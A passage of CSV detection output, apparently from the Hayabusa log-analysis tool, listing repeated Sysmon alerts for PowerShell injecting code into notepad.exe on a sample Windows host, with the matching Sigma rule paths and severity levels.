Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.223 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.223 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.223 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.255 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.255 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.255 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.255 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.270 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.270 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.270 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.270 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.286 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.286 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.286 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.286 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.317 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.317 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.317 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.317 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.333 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.333 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.333 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.333 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.348 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.348 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.348 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.348 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.364 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.364 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.364 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.364 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.380 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.380 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.380 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.380 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.395 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.395 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.395 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.395 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.411 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.411 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.411 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.411 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.426 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.426 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.426 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.426 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.458 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.458 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.458 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.458 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.473 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.473 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.473 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.473 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.489 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.489 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.489 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.489 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.505 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.505 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.505 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.505 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.520 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.520 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.520 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.520 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.536 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.536 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.536 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.536 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.551 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.551 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.551 +00:00,IEWIN7,8,high,,Remote Thread Creation in Suspicious Targets,,rules/sigma/create_remote_thread/create_remote_thread_win_suspicious_targets.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.551 +00:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.567 +00:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-18 17:16:16.567 +00:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx 